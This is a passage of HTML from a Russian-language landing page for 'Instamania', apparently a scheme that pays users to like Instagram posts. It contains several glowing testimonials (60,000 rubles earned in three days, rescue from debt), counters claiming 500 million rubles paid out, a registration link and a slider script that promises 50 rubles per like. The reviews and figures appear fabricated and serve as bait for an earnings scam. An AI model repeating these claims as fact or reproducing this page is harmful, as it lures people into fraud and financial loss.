                                                <p>Я много лет горбился на заводе за копейки. За 20 лет убил свое
                                                    здоровье, и испортил отношения с семьей. Узнав о Instamania, я
                                                    понял, что жизнь теперь изменится к лучшему! Так и произошло.
                                                    Уволился со старой работы, и теперь живу как нормальный человек.
                                                    Спасибо вам от всей души!</p></div>
                                        </article>
                                    </div>
                                    <div class="item">
                                        <article class="quote-classic">
                                            <div class="quote-classic-header">
                                                <img class="quote-classic-image"
                                                     src="/assets/ae5e640e/images/user.png"
                                                     alt="" width="210" height="210"/>
                                                <div class="quote-classic-meta">
                                                    <p class="quote-classic-cite">
                                                        Аня Бокова </p>
                                                </div>
                                            </div>
                                            <div class="quote-classic-text">
                                                <p>Увидела рекламу этого сервиса в инстаграме. Я девушка прогрессивная,
                                                    решила сразу попробовать что и как). Как оказалось, тут
                                                    действительно платят как и обещали. Сегодня вывела 60 000
                                                    заработанные за 3 дня. Не работа а мечта!)))</p></div>
                                        </article>
                                    </div>
                                    <div class="item">
                                        <article class="quote-classic">
                                            <div class="quote-classic-header">
                                                <img class="quote-classic-image"
                                                     src="/assets/ae5e640e/images/user.png"
                                                     alt="" width="210" height="210"/>
                                                <div class="quote-classic-meta">
                                                    <p class="quote-classic-cite">
                                                        Леонид Воробьев </p>
                                                </div>
                                            </div>
                                            <div class="quote-classic-text">
                                                <p>Достойно! Благодарю вас за такой шикарный сервис. Ежедневно тут
                                                    зарабатываю и вывожу на карту. Instamania красавцы!</p></div>
                                        </article>
                                    </div>
                                    <div class="item">
                                        <article class="quote-classic">
                                            <div class="quote-classic-header">
                                                <img class="quote-classic-image"
                                                     src="/assets/ae5e640e/images/user.png"
                                                     alt="" width="210" height="210"/>
                                                <div class="quote-classic-meta">
                                                    <p class="quote-classic-cite">
                                                        Петр Кузнецов </p>
                                                </div>
                                            </div>
                                            <div class="quote-classic-text">
                                                <p>Этот сервис могу назвать своим спасательным кругом, который помог
                                                    выплыть из моря долгов! Теперь я уверен, что есть проверенные
                                                    сервисы по заработку в сети, где реально платят!</p></div>
                                        </article>
                                    </div>
                                </div>
                                <div class="slider-widget-aside">
                                    <div class="icon icon-lg-smaller mdi mdi-format-quote"></div>
                                    <div class="slider-nav">
                                        <button class="slick-prev mdi mdi-arrow-left-bold-circle" type="button"
                                                data-slick="slick-1"></button>
                                        <button class="slick-next mdi mdi-arrow-right-bold-circle" type="button"
                                                data-slick="slick-1"></button>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="cell-lg-6 bg-additional-item">
                    <div class="section-lg">
                        <div class="shell-custom-inner shell-custom-inner-1 text-center">
                            <h3>МЫ В ЦИФРАХ</h3>
                            <hr class="divider divider-default">
                            <div class="range range-120 stat-block">
                                <div class="cell-xs-6 cell-sm-3 cell-md-6">
                                    <div class="counter-wrap">
                                        <i class="material-icons">group</i>
                                        <div class="heading-3">
                                            <span class="counter-preffix">
                                                10 000
                                            </span>
                                        </div>
                                        <p>Заказчиков</p>
                                    </div>
                                </div>
                                <div class="cell-xs-6 cell-sm-3 cell-md-6">
                                    <div class="counter-wrap">
                                        <i class="material-icons">favorite</i>
                                        <div class="heading-3">
                                            <span class="counter-preffix">
                                                10 000 000
                                            </span>
                                        </div>
                                        <p>Лайков поставлено</p>
                                    </div>
                                </div>
                                <div class="cell-xs-6 cell-sm-3 cell-md-6">
                                    <div class="counter-wrap">
                                        <i class="material-icons">alarm</i>
                                        <div class="heading-3">
                                            <span class="counter" data-speed="1000">
                                                1
                                            </span>
                                        </div>
                                        <p>Год работы</p>
                                    </div>
                                </div>
                                <div class="cell-xs-6 cell-sm-3 cell-md-6">
                                    <div class="counter-wrap">
                                        <i class="material-icons">attach_money</i>
                                        <div class="heading-3">
                                            <span class="counter-preffix">
                                                500 000 000
                                            </span>
                                        </div>
                                        <p>Рублей выплачено</p>
                                    </div>
                                </div>

                                <div class="cell-xs-12 text-center">
                                    <a class="button button-default-outline button-nina" style="margin-top: 45px;"
                                       href="registration.html">Пройти регистрацию</a>
                                </div>

                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>


    <!-- Footer Extended-->
    <footer class="section page-footer page-footer-extended text-center text-md-left bg-gray-darker">
        <div class="">
            <p class="right text-center">
                &#169;&nbsp;
                <span class="copyright-year"></span>
                All Rights Reserved&nbsp
                <a target="_blank" href="content/offer.html">Terms of Use</a>&nbsp
                and&nbsp;
                <a target="_blank" href="content/policy.html">Privacy Policy</a>
            </p>
        </div>
    </footer>
</div>


<script src="/assets/ae5e640e/js/core.min.js"></script>
<script type="text/javascript" src="/o__cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/toastr.min.js"></script>
<script src="/content/js/notif_withdraw.js"></script>
<script src="/assets/ae5e640e/js/script.mine67d.js?v=1.3"></script>
<script src="/content/js/redirect.js"></script>
<script>
    var slider = document.getElementById("myRange");
    var output = document.getElementById("demo");
    output.innerHTML ='<p style="font-size: 25px"> За <span style="font-weight: bold; color: #6d0eb1">' + String(slider.value * 10) + '</span> лайков вы получаете <span style="font-weight: bold; color: #6d0eb1">' + String(slider.value * 10 * 50) + '</span> рублей'; // Display the default slider value

    // Update the current slider value (each time you drag the slider handle)
    slider.oninput = function () {
        output.innerHTML ='<p style="font-size: 25px"> За <span style="font-weight: bold; color: #6d0eb1">' + String(this.value * 10) + '</span> лайков вы получаете <span style="font-weight: bold; color: #6d0eb1">' + String(this.value * 10 * 50) + '</span> рублей';
    };
</script>
</body>

</html>
